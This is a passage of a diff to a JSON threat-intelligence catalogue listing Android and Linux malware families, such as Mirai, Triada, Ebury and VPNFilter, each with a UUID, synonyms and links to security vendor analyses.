+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.rootnik",
+ "https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer",
+ "https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java"
+ ]
+ },
+ "uuid": "db3dcfd1-79d2-4c91-898f-5f2463d7c417",
+ "value": "Rootnik",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.skygofree",
+ "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/",
+ "https://cdn.securelist.com/files/2018/01/Skygofree_appendix_eng.pdf"
+ ]
+ },
+ "uuid": "f5fded3c-8f45-471a-a372-d8be101e1b22",
+ "value": "Skygofree",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "SlemBunk"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slempo",
+ "https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html",
+ "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html"
+ ]
+ },
+ "uuid": "d87e2574-7b9c-4ea7-98eb-88f3e139f6ff",
+ "value": "Slempo",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slocker",
+ 
"https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/"
+ ]
+ },
+ "uuid": "fe187c8a-25d4-4d30-bd43-efca18d527f0",
+ "value": "Slocker",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsspy"
+ ]
+ },
+ "uuid": "7a38c552-0e1a-4980-8d62-1aa38617efab",
+ "value": "SMSspy",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spybanker",
+ "https://news.drweb.com/show/?i=11104&lng=en",
+ "http://www.welivesecurity.com/2017/02/23/released-android-malware-source-code-used-run-banking-botnet/"
+ ]
+ },
+ "uuid": "e186384b-8001-4cdd-b170-1548deb8bf04",
+ "value": "SpyBanker",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote",
+ "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr"
+ ]
+ },
+ "uuid": "31592c69-d540-4617-8253-71ae0c45526c",
+ "value": "SpyNote",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthagent",
+ "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF"
+ ]
+ },
+ "uuid": "0777cb30-534f-44bb-a7af-906a422bd624",
+ "value": "StealthAgent",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthmango",
+ "https://www.lookout.com/info/stealth-mango-report-ty"
+ ]
+ },
+ "uuid": "7d480f11-3de8-463d-8a19-54685c8b9e0f",
+ "value": "Stealth Mango",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.svpeng",
+ "https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/"
+ ]
+ },
+ "uuid": "d99c0a47-9d61-4d92-86ec-86a87b060d76",
+ "value": "Svpeng",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.switcher",
+ "https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/"
+ ]
+ },
+ "uuid": "e3e90666-bc19-4741-aca8-1e4cbc2f4c9e",
+ "value": "Switcher",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.telerat",
+ "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/"
+ ]
+ },
+ "uuid": "e1600d04-d2f7-4862-8bbc-0f038ea683ea",
+ "value": "TeleRAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tempting_cedar",
+ "https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware"
+ ]
+ },
+ "uuid": "982c3554-1df2-4062-8f32-f311940ad9ff",
+ "value": "TemptingCedar Spyware",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Catelites Android Bot",
+ "MarsElite Android Bot"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tinyz",
+ "http://blog.group-ib.com/cron"
+ ]
+ },
+ "uuid": "93b27a50-f9b7-4ab6-bb9f-70a4b914eec3",
+ "value": "TinyZ",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.titan",
+ "https://blog.lookout.com/titan-mobile-threat",
+ "https://www.alienvault.com/blogs/labs-research/delivery-keyboy"
+ ]
+ },
+ "uuid": "7d418da3-d9d2-4005-8cc7-7677d1b11327",
+ "value": "Titan",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada",
+ 
"https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/",
+ "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html",
+ "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/",
+ "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/",
+ "https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/"
+ ]
+ },
+ "uuid": "fa5fdfd2-8142-43f5-9b48-d1033b5398c8",
+ "value": "Triada",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_001",
+ "https://twitter.com/illegalFawn/status/826775250583035904"
+ ]
+ },
+ "uuid": "bbd5a32e-a080-4f16-98ea-ad8863507aa6",
+ "value": "Unidentified APK 001",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_002"
+ ]
+ },
+ "uuid": "afb6a7cc-4185-4f19-8ad4-45dcbb76e544",
+ "value": "Unidentified APK 002",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.viper_rat",
+ "https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/",
+ "https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/"
+ ]
+ },
+ "uuid": "3482f5fe-f129-4c77-ae98-76e25f6086b9",
+ "value": "Viper RAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex",
+ "https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/",
+ "https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/"
+ ]
+ },
+ "uuid": "77f2254c-9886-4eed-a7c3-bbcef4a97d46",
+ "value": "WireX",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ 
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.xbot", + "https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/", + "https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/" + ] + }, + "uuid": "4cfa42a3-71d9-43e2-bf23-daa79f326387", + "value": "Xbot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xrat", + "https://blog.lookout.com/xrat-mobile-threat" + ] + }, + "uuid": "a8f167a8-30b9-4953-8eb6-247f0d046d32", + "value": "XRat", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark", + "https://securelist.com/whos-who-in-the-zoo/85394", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf" + ] + }, + "uuid": "b1fc66de-fda7-4f0c-af00-751d334444b3", + "value": "ZooPark", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Qysly" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ztorg", + "https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1", + "http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2", + "https://securelist.com/ztorg-from-rooting-to-sms/78775/" + ] + }, + "uuid": "9fbf97c0-d87a-47b0-a511-0147a58b5202", + "value": "Ztorg", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.backdoor_irc16", + "https://news.drweb.com/show/?c=5&i=10193&lng=en" + ] + }, + "uuid": "3008fa01-492a-42e2-ab9b-a0a9d12823b8", + "value": "Irc16", + "description": "" + }, + { + "meta": { + "synonyms": [ + "gayfgt", + "Gafgyt", + "qbot", + "torlus", + "lizkebab" + ], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite", + "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/", + "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/", + "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf" + ] + }, + "uuid": "81917a93-6a70-4334-afe2-56904c1fafe9", + "value": "Bashlite", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CDorked.A" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdorked", + "https://www.symantec.com/security-center/writeup/2013-050214-5501-99", + "https://blogs.cisco.com/security/linuxcdorked-faqs", + "https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/", + "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/", + "https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html" + ] + }, + "uuid": "bb9eaaec-97c9-4014-94dd-129cecf31ff0", + "value": "CDorked", + "description": "This is in the same family as eBury, Calfbot, and is also likely related to DarkLeech" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.chapro", + "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", + "http://blog.eset.com/2012/12/18/malicious-apache-module-used-for-content-injection-linuxchapro-a" + ] + }, + "uuid": "700366d8-4036-4e48-9a5f-bd6e09fb9b6b", + "value": "Chapro", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cpuminer", + "https://github.com/pooler/cpuminer" + ] + }, + "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", + "value": "Cpuminer", + "description": "This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury", + "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy", + "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf", + "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/", + "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/" + ] + }, + "uuid": "ce79265c-a467-4a17-b27d-7ec7954688d5", + "value": "Ebury", + "description": "This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.\r\n\r\nThis family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.erebus", + "https://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/" + ] + }, + "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", + "value": "Erebus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ext4", + "https://www.recordedfuture.com/chinese-cyberespionage-operations/" + ] + }, + "uuid": "79b2b3c0-6119-4511-9c33-2a48532b6a60", + "value": "ext4", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime", + "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf", + "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", + "https://x86.re/blog/hajime-a-follow-up/", + "http://blog.netlab.360.com/hajime-status-report-en/", + 
"https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things", + "https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461", + "https://blog.netlab.360.com/quick-summary-port-8291-scan-en/", + "https://github.com/Psychotropos/hajime_hashes" + ] + }, + "uuid": "ff8ee85f-4175-4f5a-99e5-0cbc378f1489", + "value": "Hajime", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hakai", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/" + ] + }, + "uuid": "0839c28a-ea11-44d4-93d1-24b246ef6743", + "value": "Hakai", + "description": "" + }, + { + "meta": { + "synonyms": [ + "HNS" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek", + "https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/", + "https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/", + "https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/", + "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/", + "https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/", + "https://blog.netlab.360.com/hns-botnet-recent-activities-en/" + ] + }, + "uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b", + "value": "Hide and Seek", + "description": "" + }, + { + "meta": { + "synonyms": [ + "IoTroop", + "Reaper" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.iot_reaper", + "https://research.checkpoint.com/new-iot-botnet-storm-coming/", + "http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/", + "https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm", 
+ "https://embedi.com/blog/grim-iot-reaper-1-and-0-day-vulnerabilities-at-the-service-of-botnets/" + ] + }, + "uuid": "37c357a1-ec09-449f-b5a9-c1ef1fba2de2", + "value": "IoT Reaper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.jenx", + "https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/" + ] + }, + "uuid": "6a4365fc-8448-4270-ba93-0341788d004b", + "value": "JenX", + "description": "" + }, + { + "meta": { + "synonyms": [ + "STD" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten", + "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf" + ] + }, + "uuid": "9b618703-58f6-4f0b-83a4-d4f13e2e5d12", + "value": "Kaiten", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lady", + "https://news.drweb.com/news/?i=10140&lng=en" + ] + }, + "uuid": "f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d", + "value": "Lady", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey", + "http://www.morphick.com/resources/lab-blog/mikey-linux-keylogger" + ] + }, + "uuid": "aae3b83d-a116-4ebc-aae0-f6327ef174ea", + "value": "MiKey", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai", + "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/", + "http://osint.bambenekconsulting.com/feeds/", + "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/", + "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", + "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/", + 
"https://isc.sans.edu/diary/22786", + "https://github.com/jgamblin/Mirai-Source-Code", + "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/" + ] + }, + "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", + "value": "Mirai", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mokes", + "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" + ] + }, + "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", + "value": "Mokes", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moose", + "http://www.welivesecurity.com/2015/05/26/moose-router-worm/", + "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/", + "http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/" + ] + }, + "uuid": "7fdb91ea-52dc-499c-81f9-3dd824e2caa0", + "value": "Moose", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack", + "https://news.drweb.com/?i=5760&c=23&lng=en" + ] + }, + "uuid": "fc047e32-9cf2-4a92-861a-be882efd8a50", + "value": "MrBlack", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.owari", + "https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/", + "https://twitter.com/ankit_anubhav/status/1019647993547550720", + "https://twitter.com/360Netlab/status/1019759516789821441", + "https://twitter.com/hrbrmstr/status/1019922651203227653", + 
"https://blog.newskysecurity.com/understanding-the-iot-hacker-a-conversation-with-owari-sora-iot-botnet-author-117feff56863", + "https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html", + "https://www.scmagazine.com/malware-author-anarchy-builds-18000-strong-huawei-router-botnet/article/782395/" + ] + }, + "uuid": "ec67f206-6464-48cf-a012-3cdfc1278488", + "value": "Owari", + "description": "Mirai variant by actor \"Anarchy\" that used CVE-2017-17215 in July 2018 to compromise 18,000+ devices." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.penquin_turla", + "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf", + "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf", + "https://twitter.com/juanandres_gs/status/944741575837528064" + ] + }, + "uuid": "262e0cf2-2fed-4d37-8d7a-0fd62c712840", + "value": "Penquin Turla", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.persirai", + "http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/" + ] + }, + "uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7", + "value": "Persirai", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.r2r2", + "https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/" + ] + }, + "uuid": "759f8590-a049-4c14-be8a-e6605e2cd43d", + "value": "r2r2", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rakos", + "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/" + ] + }, + "uuid": "4592384c-48a7-4e16-b492-7add50a7d2f5", + "value": "Rakos", + "description": "" + }, + { + 
"meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rex", + "https://thisissecurity.net/2016/10/28/octopus-rex-evolution-of-a-multi-task-botnet/", + "https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/" + ] + }, + "uuid": "49639ff5-e0be-4b6a-850b-d5d8dd37e62b", + "value": "Rex", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori", + "http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/", + "http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori", + "http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/", + "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/", + "https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/", + "https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/" + ] + }, + "uuid": "9e5d83a8-1181-43fe-a77f-28c8c75ffbd0", + "value": "Satori", + "description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361)." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shellbind", + "http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-update-new-threat-exploits-sambacry" + ] + }, + "uuid": "b51caf06-736e-46fc-9b13-48b0b81df4b7", + "value": "ShellBind", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shishiga", + "https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/" + ] + }, + "uuid": "51da734c-70dd-4337-ab08-ab61457e0da5", + "value": "Shishiga", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.spamtorte", + "http://cyber.verint.com/resource/spamtorte-v2-investigating-a-multi-layered-spam-botnet/" + ] + }, + "uuid": "7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0", + "value": "Spamtorte", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sshdoor", + "http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html" + ] + }, + "uuid": "275d65b9-0894-4c9b-a255-83daddb2589c", + "value": "SSHDoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko", + "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/" + ] + }, + "uuid": "e8c131df-ee3b-41d4-992d-71d3090d2d98", + "value": "Stantinko", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.torii", + "https://blog.avast.com/new-torii-botnet-threat-research" + ] + }, + "uuid": "a874575e-0ad7-464d-abb6-8f4b7964aa92", + "value": "Torii", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + 
"refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.trump_bot", + "http://paper.seebug.org/345/" + ] + }, + "uuid": "feb6a5f6-32f9-447d-af9c-08e499457883", + "value": "Trump Bot", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Amnesia", + "Radiation" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami", + "https://www.8ackprotect.com/blog/big_brother_is_attacking_you", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/", + "http://get.cyberx-labs.com/radiation-report" + ] + }, + "uuid": "21540126-d0bb-42ce-9b93-341fedb94cac", + "value": "Tsunami", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.turla_rat" + ] + }, + "uuid": "1b62a421-c0db-4425-bcb2-a4925d5d33e0", + "value": "Turla RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Espeon" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.umbreon", + "http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/", + "http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html" + ] + }, + "uuid": "637000f7-4363-44e0-b795-9cfb7a3dc460", + "value": "Umbreon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter", + "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1", + "https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html", + "https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities", + 
"https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected", + "https://blog.talosintelligence.com/2018/05/VPNFilter.html", + "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en", + "https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware" + ] + }, + "uuid": "5ad30da2-2645-4893-acd9-3f8e0fbb5500", + "value": "elf.vpnfilter", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess" + ] + }, + "uuid": "b0046a6e-3b8b-45ad-a357-dabc46aba7de", + "value": "elf.wellmess", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wirenet", + "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", + "https://news.drweb.com/show/?i=2679&lng=en&c=14" + ] + }, + "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e", + "value": "Wirenet", + "description": "" + }, + { + "meta": { + "synonyms": [ + "splm", + "chopstick", + "fysbis" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", + "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf", + "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/" + ] + }, + "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", + "value": "X-Agent", + "description": "" + }, + { + "meta": { + 